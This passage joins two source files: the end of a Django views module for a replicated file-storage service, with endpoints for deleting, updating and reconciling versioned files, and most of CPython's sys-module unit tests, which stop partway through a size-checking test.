files = File.objects.filter(name=name)
buckets = Bucket.objects.filter(name=bucket)
count = 0
print(name, files)
print(bucket, buckets)
if len(buckets) == 0:
result = 'No such bucket exists'
elif len(files) == 0:
result = 'File doesn\'t exist.'
else:
os.remove(path)
bucket_model = Bucket.objects.get(name=bucket)
file_model = File.objects.get(name=name, bucket=bucket_model)
file_model.delete()
result = 'File Deletion Successful'
count += 1
count += replicateDeleteFile(name, bucket)
data = {'result': result, 'count': count, 'vector_clocks': {}}
return JsonResponse(data)
@method_decorator(csrf_exempt, name='dispatch')
class ReplicateDeleteFile(TemplateView):
def post(self, request):
name = request.POST.get('name')
bucket = request.POST.get('bucket')
path = os.path.join(ARCHIVE_DIR, bucket, name)
files = File.objects.filter(name=name)
buckets = Bucket.objects.filter(name=bucket)
print(name, files)
print(bucket, buckets)
if len(buckets) == 0:
return HttpResponseBadRequest('No such bucket exists')
elif len(files) == 0:
return HttpResponseBadRequest('File doesn\'t exist.')
else:
os.remove(path)
bucket_model = Bucket.objects.get(name=bucket)
file_model = File.objects.get(name=name, bucket=bucket_model)
file_model.delete()
result = 'File Deletion Successful'
return HttpResponse(result)
@method_decorator(csrf_exempt, name='dispatch')
class UpdateFile(TemplateView):
def post(self, request):
file = request.FILES['file']
name = request.POST['name']
bucket = request.POST['bucket']
path = os.path.join(ARCHIVE_DIR, bucket, name)
files = File.objects.filter(name=name)
buckets = Bucket.objects.filter(name=bucket)
count = 0
result = ''
clocks = {}
print(name, files)
print(bucket, buckets)
if len(buckets) == 0:
result = 'No such bucket exists'
elif len(files) == 0:
result = 'File doesn\'t exist.'
else:
with open(path, 'wb') as f:
for chunk in file.chunks():
f.write(chunk)
bucket_model = Bucket.objects.get(name=bucket)
file_model = File.objects.get(name=name, bucket=bucket_model)
file_model.version += 1
file_model.save()
clocks = {NODE_NAME: file_model.version}
result = 'File Updation Successful'
count += 1
rep_count, rep_clocks = replicateUpdateFile(name, bucket, file)
print(rep_count, rep_clocks)
count += rep_count
clocks = {**clocks, **rep_clocks}
data = {'result': result, 'count': count, 'vector_clocks': clocks}
return JsonResponse(data)
@method_decorator(csrf_exempt, name='dispatch')
class ReplicateUpdateFile(TemplateView):
def post(self, request):
file = request.FILES['file']
name = request.POST.get('name')
bucket = request.POST.get('bucket')
vector = int(request.POST.get('vector'))
timestamp = float(request.POST.get('timestamp'))
path = os.path.join(ARCHIVE_DIR, bucket, name)
files = File.objects.filter(name=name)
buckets = Bucket.objects.filter(name=bucket)
print(name, files)
print(bucket, buckets)
if len(buckets) == 0:
return HttpResponseBadRequest('No such bucket exists')
elif len(files) == 0:
return HttpResponseBadRequest('File doesn\'t exist.')
else:
bucket_model = Bucket.objects.get(name=bucket)
file_model = File.objects.get(name=name, bucket=bucket_model)
if vector > file_model.version:
with open(path, 'wb') as f:
for chunk in file.chunks():
f.write(chunk)
file_model.version += 1
file_model.save()
result = 'File Updation Successful'
elif vector == file_model.version and timestamp > file_model.last_modified.timestamp():
with open(path, 'wb') as f:
for chunk in file.chunks():
f.write(chunk)
file_model.version += 1
file_model.save()
result = 'File Updation Successful'
else:
result = 'File is version is higher than the recieved file'
result = {'vector': file_model.version, 'status': result}
return JsonResponse(result)
@method_decorator(csrf_exempt, name='dispatch')
class FileDownload(TemplateView):
def get(self, request, bucket, name):
try:
bucket_model = Bucket.objects.get(name=bucket)
file = File.objects.get(name=name, bucket=bucket_model)
if file:
print('File exists')
except ObjectDoesNotExist:
return HttpResponseNotFound('Invalid File')
filepath = os.path.join(ARCHIVE_DIR, bucket, name)
mimetype = mimetypes.MimeTypes().guess_type(filepath)[0]
response = HttpResponse()
response['X-Sendfile'] = filepath
response['Content-Type'] = mimetype
response['Content-Disposition'] = 'attachment; filename=%s' % name
return response
@method_decorator(csrf_exempt, name='dispatch')
class GetVector(TemplateView):
def post(self, request):
try:
name = request.POST.get('name')
bucket = request.POST.get('bucket')
bucket_model = Bucket.objects.get(name=bucket)
file = File.objects.get(name=name, bucket=bucket_model)
result = {'node': NODE_NAME, 'vector': file.version, 'timestamp': file.last_modified.timestamp()}
return JsonResponse(result)
except ObjectDoesNotExist:
return HttpResponseNotFound('Invalid File')
@method_decorator(csrf_exempt, name='dispatch')
class ReadReconciliation(TemplateView):
def post(self, request):
try:
name = request.POST.get('name')
bucket = request.POST.get('bucket')
vector = int(request.POST.get('vector'))
timestamp = float(request.POST.get('timestamp'))
file = request.FILES['file']
path = os.path.join(ARCHIVE_DIR, bucket, name)
bucket_model = Bucket.objects.get(name=bucket)
file_model = File.objects.get(name=name, bucket=bucket_model)
if vector > file_model.version:
with open(path, 'wb') as f:
for chunk in file.chunks():
f.write(chunk)
file_model.version = vector
file_model.save()
result = 'File Updation Successful'
elif vector == file_model.version and timestamp > file_model.last_modified.timestamp():
with open(path, 'wb') as f:
for chunk in file.chunks():
f.write(chunk)
file_model.version = vector
file_model.save()
result = 'File Updation Successful'
else:
result = 'File is version is higher than the recieved file'
result = {'vector': file_model.version, 'status': result}
return JsonResponse(result)
except ObjectDoesNotExist:
return HttpResponseNotFound('Invalid File')
|
test_sys.py
|
import unittest, test.support
from test.script_helper import assert_python_ok, assert_python_failure
import sys, io, os
import struct
import subprocess
import textwrap
import warnings
import operator
import codecs
import gc
import sysconfig
import platform
# count the number of test runs, used to create unique
# strings to intern in test_intern()
numruns = 0
try:
import threading
except ImportError:
threading = None
class SysModuleTest(unittest.TestCase):
def setUp(self):
self.orig_stdout = sys.stdout
self.orig_stderr = sys.stderr
self.orig_displayhook = sys.displayhook
def tearDown(self):
sys.stdout = self.orig_stdout
sys.stderr = self.orig_stderr
sys.displayhook = self.orig_displayhook
test.support.reap_children()
def test_original_displayhook(self):
import builtins
out = io.StringIO()
sys.stdout = out
dh = sys.__displayhook__
self.assertRaises(TypeError, dh)
if hasattr(builtins, "_"):
del builtins._
dh(None)
self.assertEqual(out.getvalue(), "")
self.assertTrue(not hasattr(builtins, "_"))
dh(42)
self.assertEqual(out.getvalue(), "42\n")
self.assertEqual(builtins._, 42)
del sys.stdout
self.assertRaises(RuntimeError, dh, 42)
def test_lost_displayhook(self):
del sys.displayhook
code = compile("42", "<string>", "single")
self.assertRaises(RuntimeError, eval, code)
def test_custom_displayhook(self):
def baddisplayhook(obj):
raise ValueError
sys.displayhook = baddisplayhook
code = compile("42", "<string>", "single")
self.assertRaises(ValueError, eval, code)
def test_original_excepthook(self):
err = io.StringIO()
sys.stderr = err
eh = sys.__excepthook__
self.assertRaises(TypeError, eh)
try:
raise ValueError(42)
except ValueError as exc:
eh(*sys.exc_info())
self.assertTrue(err.getvalue().endswith("ValueError: 42\n"))
def test_excepthook(self):
with test.support.captured_output("stderr") as stderr:
sys.excepthook(1, '1', 1)
self.assertTrue("TypeError: print_exception(): Exception expected for " \
"value, str found" in stderr.getvalue())
# FIXME: testing the code for a lost or replaced excepthook in
# Python/pythonrun.c::PyErr_PrintEx() is tricky.
def test_exit(self):
# call with two arguments
self.assertRaises(TypeError, sys.exit, 42, 42)
# call without argument
with self.assertRaises(SystemExit) as cm:
sys.exit()
self.assertIsNone(cm.exception.code)
rc, out, err = assert_python_ok('-c', 'import sys; sys.exit()')
self.assertEqual(rc, 0)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
# call with integer argument
with self.assertRaises(SystemExit) as cm:
sys.exit(42)
self.assertEqual(cm.exception.code, 42)
# call with tuple argument with one entry
# entry will be unpacked
with self.assertRaises(SystemExit) as cm:
sys.exit((42,))
self.assertEqual(cm.exception.code, 42)
# call with string argument
with self.assertRaises(SystemExit) as cm:
sys.exit("exit")
self.assertEqual(cm.exception.code, "exit")
# call with tuple argument with two entries
with self.assertRaises(SystemExit) as cm:
sys.exit((17, 23))
self.assertEqual(cm.exception.code, (17, 23))
# test that the exit machinery handles SystemExits properly
rc, out, err = assert_python_failure('-c', 'raise SystemExit(47)')
self.assertEqual(rc, 47)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
def check_exit_message(code, expected, **env_vars):
rc, out, err = assert_python_failure('-c', code, **env_vars)
self.assertEqual(rc, 1)
self.assertEqual(out, b'')
self.assertTrue(err.startswith(expected),
"%s doesn't start with %s" % (ascii(err), ascii(expected)))
# test that stderr buffer is flushed before the exit message is written
# into stderr
check_exit_message(
r'import sys; sys.stderr.write("unflushed,"); sys.exit("message")',
b"unflushed,message")
# test that the exit message is written with backslashreplace error
# handler to stderr
check_exit_message(
r'import sys; sys.exit("surrogates:\uDCFF")',
b"surrogates:\\udcff")
# test that the unicode message is encoded to the stderr encoding
# instead of the default encoding (utf8)
check_exit_message(
r'import sys; sys.exit("h\xe9")',
b"h\xe9", PYTHONIOENCODING='latin-1')
def test_getdefaultencoding(self):
self.assertRaises(TypeError, sys.getdefaultencoding, 42)
# can't check more than the type, as the user might have changed it
self.assertIsInstance(sys.getdefaultencoding(), str)
# testing sys.settrace() is done in test_sys_settrace.py
# testing sys.setprofile() is done in test_sys_setprofile.py
def test_setcheckinterval(self):
with warnings.catch_warnings():
warnings.simplefilter("ignore")
self.assertRaises(TypeError, sys.setcheckinterval)
orig = sys.getcheckinterval()
for n in 0, 100, 120, orig: # orig last to restore starting state
sys.setcheckinterval(n)
self.assertEqual(sys.getcheckinterval(), n)
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_switchinterval(self):
self.assertRaises(TypeError, sys.setswitchinterval)
self.assertRaises(TypeError, sys.setswitchinterval, "a")
self.assertRaises(ValueError, sys.setswitchinterval, -1.0)
self.assertRaises(ValueError, sys.setswitchinterval, 0.0)
orig = sys.getswitchinterval()
# sanity check
self.assertTrue(orig < 0.5, orig)
try:
for n in 0.00001, 0.05, 3.0, orig:
sys.setswitchinterval(n)
self.assertAlmostEqual(sys.getswitchinterval(), n)
finally:
sys.setswitchinterval(orig)
def test_recursionlimit(self):
self.assertRaises(TypeError, sys.getrecursionlimit, 42)
oldlimit = sys.getrecursionlimit()
self.assertRaises(TypeError, sys.setrecursionlimit)
self.assertRaises(ValueError, sys.setrecursionlimit, -42)
sys.setrecursionlimit(10000)
self.assertEqual(sys.getrecursionlimit(), 10000)
sys.setrecursionlimit(oldlimit)
@unittest.skipIf(hasattr(sys, 'gettrace') and sys.gettrace(),
'fatal error if run with a trace function')
def test_recursionlimit_recovery(self):
# NOTE: this test is slightly fragile in that it depends on the current
# recursion count when executing the test being low enough so as to
# trigger the recursion recovery detection in the _Py_MakeEndRecCheck
# macro (see ceval.h).
oldlimit = sys.getrecursionlimit()
def f():
f()
try:
for i in (50, 1000):
# Issue #5392: stack overflow after hitting recursion limit twice
sys.setrecursionlimit(i)
self.assertRaises(RuntimeError, f)
self.assertRaises(RuntimeError, f)
finally:
sys.setrecursionlimit(oldlimit)
def test_recursionlimit_fatalerror(self):
# A fatal error occurs if a second recursion limit is hit when recovering
# from a first one.
code = textwrap.dedent("""
import sys
def f():
try:
f()
except RuntimeError:
f()
sys.setrecursionlimit(%d)
f()""")
with test.support.SuppressCrashReport():
for i in (50, 1000):
sub = subprocess.Popen([sys.executable, '-c', code % i],
stderr=subprocess.PIPE)
err = sub.communicate()[1]
self.assertTrue(sub.returncode, sub.returncode)
self.assertIn(
b"Fatal Python error: Cannot recover from stack overflow",
err)
def test_getwindowsversion(self):
# Raise SkipTest if sys doesn't have getwindowsversion attribute
test.support.get_attribute(sys, "getwindowsversion")
v = sys.getwindowsversion()
self.assertEqual(len(v), 5)
self.assertIsInstance(v[0], int)
self.assertIsInstance(v[1], int)
self.assertIsInstance(v[2], int)
self.assertIsInstance(v[3], int)
self.assertIsInstance(v[4], str)
self.assertRaises(IndexError, operator.getitem, v, 5)
self.assertIsInstance(v.major, int)
self.assertIsInstance(v.minor, int)
self.assertIsInstance(v.build, int)
self.assertIsInstance(v.platform, int)
self.assertIsInstance(v.service_pack, str)
self.assertIsInstance(v.service_pack_minor, int)
self.assertIsInstance(v.service_pack_major, int)
self.assertIsInstance(v.suite_mask, int)
self.assertIsInstance(v.product_type, int)
self.assertEqual(v[0], v.major)
self.assertEqual(v[1], v.minor)
self.assertEqual(v[2], v.build)
self.assertEqual(v[3], v.platform)
self.assertEqual(v[4], v.service_pack)
# This is how platform.py calls it. Make sure tuple
# still has 5 elements
maj, min, buildno, plat, csd = sys.getwindowsversion()
def test_call_tracing(self):
self.assertRaises(TypeError, sys.call_tracing, type, 2)
@unittest.skipUnless(hasattr(sys, "setdlopenflags"),
'test needs sys.setdlopenflags()')
def test_dlopenflags(self):
self.assertTrue(hasattr(sys, "getdlopenflags"))
self.assertRaises(TypeError, sys.getdlopenflags, 42)
oldflags = sys.getdlopenflags()
self.assertRaises(TypeError, sys.setdlopenflags)
sys.setdlopenflags(oldflags+1)
self.assertEqual(sys.getdlopenflags(), oldflags+1)
sys.setdlopenflags(oldflags)
@test.support.refcount_test
def test_refcount(self):
# n here must be a global in order for this test to pass while
# tracing with a python function. Tracing calls PyFrame_FastToLocals
# which will add a copy of any locals to the frame object, causing
# the reference count to increase by 2 instead of 1.
global n
self.assertRaises(TypeError, sys.getrefcount)
c = sys.getrefcount(None)
n = None
self.assertEqual(sys.getrefcount(None), c+1)
del n
self.assertEqual(sys.getrefcount(None), c)
if hasattr(sys, "gettotalrefcount"):
self.assertIsInstance(sys.gettotalrefcount(), int)
def test_getframe(self):
self.assertRaises(TypeError, sys._getframe, 42, 42)
self.assertRaises(ValueError, sys._getframe, 2000000000)
self.assertTrue(
SysModuleTest.test_getframe.__code__ \
is sys._getframe().f_code
)
# sys._current_frames() is a CPython-only gimmick.
def test_current_frames(self):
have_threads = True
try:
import _thread
except ImportError:
have_threads = False
if have_threads:
self.current_frames_with_threads()
else:
self.current_frames_without_threads()
# Test sys._current_frames() in a WITH_THREADS build.
@test.support.reap_threads
def current_frames_with_threads(self):
import threading
import traceback
# Spawn a thread that blocks at a known place. Then the main
# thread does sys._current_frames(), and verifies that the frames
# returned make sense.
entered_g = threading.Event()
leave_g = threading.Event()
thread_info = [] # the thread's id
def f123():
g456()
def g456():
thread_info.append(threading.get_ident())
entered_g.set()
leave_g.wait()
t = threading.Thread(target=f123)
t.start()
entered_g.wait()
# At this point, t has finished its entered_g.set(), although it's
# impossible to guess whether it's still on that line or has moved on
# to its leave_g.wait().
self.assertEqual(len(thread_info), 1)
thread_id = thread_info[0]
d = sys._current_frames()
main_id = threading.get_ident()
self.assertIn(main_id, d)
self.assertIn(thread_id, d)
# Verify that the captured main-thread frame is _this_ frame.
frame = d.pop(main_id)
self.assertTrue(frame is sys._getframe())
# Verify that the captured thread frame is blocked in g456, called
# from f123. This is a litte tricky, since various bits of
# threading.py are also in the thread's call stack.
frame = d.pop(thread_id)
stack = traceback.extract_stack(frame)
for i, (filename, lineno, funcname, sourceline) in enumerate(stack):
if funcname == "f123":
break
else:
self.fail("didn't find f123() on thread's call stack")
self.assertEqual(sourceline, "g456()")
# And the next record must be for g456().
filename, lineno, funcname, sourceline = stack[i+1]
self.assertEqual(funcname, "g456")
self.assertIn(sourceline, ["leave_g.wait()", "entered_g.set()"])
# Reap the spawned thread.
leave_g.set()
t.join()
# Test sys._current_frames() when thread support doesn't exist.
def current_frames_without_threads(self):
# Not much happens here: there is only one thread, with artificial
# "thread id" 0.
d = sys._current_frames()
self.assertEqual(len(d), 1)
self.assertIn(0, d)
self.assertTrue(d[0] is sys._getframe())
def test_attributes(self):
self.assertIsInstance(sys.api_version, int)
self.assertIsInstance(sys.argv, list)
self.assertIn(sys.byteorder, ("little", "big"))
self.assertIsInstance(sys.builtin_module_names, tuple)
self.assertIsInstance(sys.copyright, str)
self.assertIsInstance(sys.exec_prefix, str)
self.assertIsInstance(sys.base_exec_prefix, str)
self.assertIsInstance(sys.executable, str)
self.assertEqual(len(sys.float_info), 11)
self.assertEqual(sys.float_info.radix, 2)
self.assertEqual(len(sys.int_info), 2)
self.assertTrue(sys.int_info.bits_per_digit % 5 == 0)
self.assertTrue(sys.int_info.sizeof_digit >= 1)
self.assertEqual(type(sys.int_info.bits_per_digit), int)
self.assertEqual(type(sys.int_info.sizeof_digit), int)
self.assertIsInstance(sys.hexversion, int)
self.assertEqual(len(sys.hash_info), 9)
self.assertLess(sys.hash_info.modulus, 2**sys.hash_info.width)
# sys.hash_info.modulus should be a prime; we do a quick
# probable primality test (doesn't exclude the possibility of
# a Carmichael number)
for x in range(1, 100):
self.assertEqual(
pow(x, sys.hash_info.modulus-1, sys.hash_info.modulus),
1,
"sys.hash_info.modulus {} is a non-prime".format(
sys.hash_info.modulus)
)
self.assertIsInstance(sys.hash_info.inf, int)
self.assertIsInstance(sys.hash_info.nan, int)
self.assertIsInstance(sys.hash_info.imag, int)
algo = sysconfig.get_config_var("Py_HASH_ALGORITHM")
if sys.hash_info.algorithm in {"fnv", "siphash24"}:
self.assertIn(sys.hash_info.hash_bits, {32, 64})
self.assertIn(sys.hash_info.seed_bits, {32, 64, 128})
if algo == 1:
self.assertEqual(sys.hash_info.algorithm, "siphash24")
elif algo == 2:
self.assertEqual(sys.hash_info.algorithm, "fnv")
else:
self.assertIn(sys.hash_info.algorithm, {"fnv", "siphash24"})
else:
# PY_HASH_EXTERNAL
self.assertEqual(algo, 0)
self.assertGreaterEqual(sys.hash_info.cutoff, 0)
self.assertLess(sys.hash_info.cutoff, 8)
self.assertIsInstance(sys.maxsize, int)
self.assertIsInstance(sys.maxunicode, int)
self.assertEqual(sys.maxunicode, 0x10FFFF)
self.assertIsInstance(sys.platform, str)
self.assertIsInstance(sys.prefix, str)
self.assertIsInstance(sys.base_prefix, str)
self.assertIsInstance(sys.version, str)
vi = sys.version_info
self.assertIsInstance(vi[:], tuple)
self.assertEqual(len(vi), 5)
self.assertIsInstance(vi[0], int)
self.assertIsInstance(vi[1], int)
self.assertIsInstance(vi[2], int)
self.assertIn(vi[3], ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi[4], int)
self.assertIsInstance(vi.major, int)
self.assertIsInstance(vi.minor, int)
self.assertIsInstance(vi.micro, int)
self.assertIn(vi.releaselevel, ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi.serial, int)
self.assertEqual(vi[0], vi.major)
self.assertEqual(vi[1], vi.minor)
self.assertEqual(vi[2], vi.micro)
self.assertEqual(vi[3], vi.releaselevel)
self.assertEqual(vi[4], vi.serial)
self.assertTrue(vi > (1,0,0))
self.assertIsInstance(sys.float_repr_style, str)
self.assertIn(sys.float_repr_style, ('short', 'legacy'))
if not sys.platform.startswith('win'):
self.assertIsInstance(sys.abiflags, str)
@unittest.skipUnless(hasattr(sys, 'thread_info'),
'Threading required for this test.')
def test_thread_info(self):
info = sys.thread_info
self.assertEqual(len(info), 3)
self.assertIn(info.name, ('nt', 'pthread', 'solaris', None))
self.assertIn(info.lock, ('semaphore', 'mutex+cond', None))
def test_43581(self):
# Can't use sys.stdout, as this is a StringIO object when
# the test runs under regrtest.
self.assertEqual(sys.__stdout__.encoding, sys.__stderr__.encoding)
def test_intern(self):
global numruns
numruns += 1
self.assertRaises(TypeError, sys.intern)
s = "never interned before" + str(numruns)
self.assertTrue(sys.intern(s) is s)
s2 = s.swapcase().swapcase()
self.assertTrue(sys.intern(s2) is s)
# Subclasses of string can't be interned, because they
# provide too much opportunity for insane things to happen.
# We don't want them in the interned dict and if they aren't
# actually interned, we don't want to create the appearance
# that they are by allowing intern() to succeed.
class S(str):
def __hash__(self):
return 123
self.assertRaises(TypeError, sys.intern, S("abc"))
def test_sys_flags(self):
self.assertTrue(sys.flags)
attrs = ("debug",
"inspect", "interactive", "optimize", "dont_write_bytecode",
"no_user_site", "no_site", "ignore_environment", "verbose",
"bytes_warning", "quiet", "hash_randomization", "isolated")
for attr in attrs:
self.assertTrue(hasattr(sys.flags, attr), attr)
self.assertEqual(type(getattr(sys.flags, attr)), int, attr)
self.assertTrue(repr(sys.flags))
self.assertEqual(len(sys.flags), len(attrs))
def assert_raise_on_new_sys_type(self, sys_attr):
# Users are intentionally prevented from creating new instances of
# sys.flags, sys.version_info, and sys.getwindowsversion.
attr_type = type(sys_attr)
with self.assertRaises(TypeError):
attr_type()
with self.assertRaises(TypeError):
attr_type.__new__(attr_type)
def test_sys_flags_no_instantiation(self):
self.assert_raise_on_new_sys_type(sys.flags)
def test_sys_version_info_no_instantiation(self):
self.assert_raise_on_new_sys_type(sys.version_info)
def test_sys_getwindowsversion_no_instantiation(self):
# Skip if not being run on Windows.
test.support.get_attribute(sys, "getwindowsversion")
self.assert_raise_on_new_sys_type(sys.getwindowsversion())
@test.support.cpython_only
def test_clear_type_cache(self):
sys._clear_type_cache()
def test_ioencoding(self):
env = dict(os.environ)
# Test character: cent sign, encoded as 0x4A (ASCII J) in CP424,
# not representable in ASCII.
env["PYTHONIOENCODING"] = "cp424"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
expected = ("\xa2" + os.linesep).encode("cp424")
self.assertEqual(out, expected)
env["PYTHONIOENCODING"] = "ascii:replace"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, b'?')
env["PYTHONIOENCODING"] = "ascii"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
env=env)
out, err = p.communicate()
self.assertEqual(out, b'')
self.assertIn(b'UnicodeEncodeError:', err)
self.assertIn(rb"'\xa2'", err)
env["PYTHONIOENCODING"] = "ascii:"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
env=env)
out, err = p.communicate()
self.assertEqual(out, b'')
self.assertIn(b'UnicodeEncodeError:', err)
self.assertIn(rb"'\xa2'", err)
env["PYTHONIOENCODING"] = ":surrogateescape"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xdcbd))'],
stdout=subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, b'\xbd')
@unittest.skipUnless(test.support.FS_NONASCII,
'requires OS support of non-ASCII encodings')
def test_ioencoding_nonascii(self):
env = dict(os.environ)
env["PYTHONIOENCODING"] = ""
p = subprocess.Popen([sys.executable, "-c",
'print(%a)' % test.support.FS_NONASCII],
stdout=subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, os.fsencode(test.support.FS_NONASCII))
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
def test_executable(self):
# sys.executable should be absolute
self.assertEqual(os.path.abspath(sys.executable), sys.executable)
# Issue #7774: Ensure that sys.executable is an empty string if argv[0]
# has been set to an non existent program name and Python is unable to
# retrieve the real program name
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
python_dir = os.path.dirname(os.path.realpath(sys.executable))
p = subprocess.Popen(
["nonexistent", "-c",
'import sys; print(sys.executable.encode("ascii", "backslashreplace"))'],
executable=sys.executable, stdout=subprocess.PIPE, cwd=python_dir)
stdout = p.communicate()[0]
executable = stdout.strip().decode("ASCII")
p.wait()
self.assertIn(executable, ["b''", repr(sys.executable.encode("ascii", "backslashreplace"))])
def check_fsencoding(self, fs_encoding, expected=None):
self.assertIsNotNone(fs_encoding)
codecs.lookup(fs_encoding)
if expected:
self.assertEqual(fs_encoding, expected)
def test_getfilesystemencoding(self):
fs_encoding = sys.getfilesystemencoding()
if sys.platform == 'darwin':
expected = 'utf-8'
elif sys.platform == 'win32':
expected = 'mbcs'
else:
expected = None
self.check_fsencoding(fs_encoding, expected)
def c_locale_get_error_handler(self, isolated=False, encoding=None):
# Force the POSIX locale
env = os.environ.copy()
env["LC_ALL"] = "C"
code = '\n'.join((
'import sys',
'def dump(name):',
' std = getattr(sys, name)',
' print("%s: %s" % (name, std.errors))',
'dump("stdin")',
'dump("stdout")',
'dump("stderr")',
))
args = [sys.executable, "-c", code]
if isolated:
args.append("-I")
elif encoding:
env['PYTHONIOENCODING'] = encoding
p = subprocess.Popen(args,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
env=env,
universal_newlines=True)
stdout, stderr = p.communicate()
return stdout
def test_c_locale_surrogateescape(self):
out = self.c_locale_get_error_handler(isolated=True)
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
# replace the default error handler
out = self.c_locale_get_error_handler(encoding=':strict')
self.assertEqual(out,
'stdin: strict\n'
'stdout: strict\n'
'stderr: backslashreplace\n')
# force the encoding
out = self.c_locale_get_error_handler(encoding='iso8859-1')
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
def test_implementation(self):
# This test applies to all implementations equally.
levels = {'alpha': 0xA, 'beta': 0xB, 'candidate': 0xC, 'final': 0xF}
self.assertTrue(hasattr(sys.implementation, 'name'))
self.assertTrue(hasattr(sys.implementation, 'version'))
self.assertTrue(hasattr(sys.implementation, 'hexversion'))
self.assertTrue(hasattr(sys.implementation, 'cache_tag'))
version = sys.implementation.version
self.assertEqual(version[:2], (version.major, version.minor))
hexversion = (version.major << 24 | version.minor << 16 |
version.micro << 8 | levels[version.releaselevel] << 4 |
version.serial << 0)
self.assertEqual(sys.implementation.hexversion, hexversion)
# PEP 421 requires that .name be lower case.
self.assertEqual(sys.implementation.name,
sys.implementation.name.lower())
@test.support.cpython_only
def test_debugmallocstats(self):
# Test sys._debugmallocstats()
from test.script_helper import assert_python_ok
args = ['-c', 'import sys; sys._debugmallocstats()']
ret, out, err = assert_python_ok(*args)
self.assertIn(b"free PyDictObjects", err)
# The function has no parameter
self.assertRaises(TypeError, sys._debugmallocstats, True)
@unittest.skipUnless(hasattr(sys, "getallocatedblocks"),
"sys.getallocatedblocks unavailable on this build")
def test_getallocatedblocks(self):
# Some sanity checks
with_pymalloc = sysconfig.get_config_var('WITH_PYMALLOC')
a = sys.getallocatedblocks()
self.assertIs(type(a), int)
if with_pymalloc:
self.assertGreater(a, 0)
else:
# When WITH_PYMALLOC isn't available, we don't know anything
# about the underlying implementation: the function might
# return 0 or something greater.
self.assertGreaterEqual(a, 0)
try:
# While we could imagine a Python session where the number of
# multiple buffer objects would exceed the sharing of references,
# it is unlikely to happen in a normal test run.
self.assertLess(a, sys.gettotalrefcount())
except AttributeError:
# gettotalrefcount() not available
pass
gc.collect()
b = sys.getallocatedblocks()
self.assertLessEqual(b, a)
gc.collect()
c = sys.getallocatedblocks()
self.assertIn(c, range(b - 50, b + 50))
def test_is_finalizing(self):
self.assertIs(sys.is_finalizing(), False)
# Don't use the atexit module because _Py_Finalizing is only set
# after calling atexit callbacks
code = """if 1:
import sys
class AtExit:
is_finalizing = sys.is_finalizing
print = print
def __del__(self):
self.print(self.is_finalizing(), flush=True)
# Keep a reference in the __main__ module namespace, so the
# AtExit destructor will be called at Python exit
ref = AtExit()
"""
rc, stdout, stderr = assert_python_ok('-c', code)
self.assertEqual(stdout.rstrip(), b'True')
@test.support.cpython_only
class SizeofTest(unittest.TestCase):
def setUp(self):
self.P = struct.calcsize('P')
self.longdigit = sys.int_info.sizeof_digit
import _testcapi
self.gc_headsize = _testcapi.SIZEOF_PYGC_HEAD
self.file = open(test.support.TESTFN, 'wb')
def tearDown(self):
self.file.close()
test.support.unlink(test.support.TESTFN)
check_sizeof = test.support.check_sizeof
def test_gc_head_size(self):
# Check that the gc header size is added to objects tracked by the gc.
vsize = test.support.calcvobjsize
gc_header_size = self.gc_headsize
# bool objects are not gc tracked
self.assertEqual(sys.getsizeof(True), vsize('') + self.longdigit)
# but lists are
self.assertEqual(sys.getsizeof([]), vsize('Pn') + gc_header_size)
def test_errors(self):
class BadSizeof:
def __sizeof__(self):
raise ValueError
self.assertRaises(ValueError, sys.getsizeof, BadSizeof())
class InvalidSizeof:
def __sizeof__(self):
return None
self.assertRaises(TypeError, sys.getsizeof, InvalidSizeof())
sentinel = ["sentinel"]
self.assertIs(sys.getsizeof(InvalidSizeof(), sentinel), sentinel)
class FloatSizeof:
def __sizeof__(self):
return 4.5
self.assertRaises(TypeError, sys.getsizeof, FloatSizeof())
self.assertIs(sys.getsizeof(FloatSizeof(), sentinel), sentinel)
class OverflowSizeof(int):
def __sizeof__(self):
return int(self)
self.assertEqual(sys.getsizeof(OverflowSizeof(sys.maxsize)),
sys.maxsize + self.gc_headsize)
with self.assertRaises(OverflowError):
sys.getsizeof(OverflowSizeof(sys.maxsize + 1))
with self.assertRaises(ValueError):
sys.getsizeof(OverflowSizeof(-1))
with self.assertRaises((ValueError, OverflowError)):
sys.getsizeof(OverflowSizeof(-sys.maxsize - 1))
def test_default(self):
size = test.support.calcvobjsize
self.assertEqual(sys.getsizeof(True), size('') + self.longdigit)
self.assertEqual(sys.getsizeof(True, -1), size('') + self.longdigit)
def test_objecttypes(self):
# check all types defined in Objects/
size = test.support.calcobjsize
vsize = test.support.calcvobjsize
check = self.check_sizeof
# bool
check(True, vsize('') + self.longdigit)
# buffer
# XXX
# builtin_function_or_method
check(len, size('4P')) # XXX check layout
# bytearray
samples = [b'', b'u'*100000]
for sample in samples:
x = bytearray(sample)
check(x, vsize('n2Pi') + x.__alloc__())
# bytearray_iterator
check(iter(bytearray()), size('nP'))
# cell
def get_cell():
x = 42
def inner():
return x
return inner
check(get_cell().__closure__[0], size('P'))
# code
check(get_cell().__code__, size('5i9Pi3P'))
check(get_cell.__code__, size('5i9Pi3P'))
def get_cell2(x):
def inner():
return x
return inner
check(get_cell2.__code__, size('5i9Pi3P') + 1)
# complex
check(complex(0,1), size('2d'))
# method_descriptor (descriptor object)
check(str.lower, size('3PP'))
# classmethod_descriptor (descriptor object)
# XXX
# member_descriptor (descriptor object)
import datetime
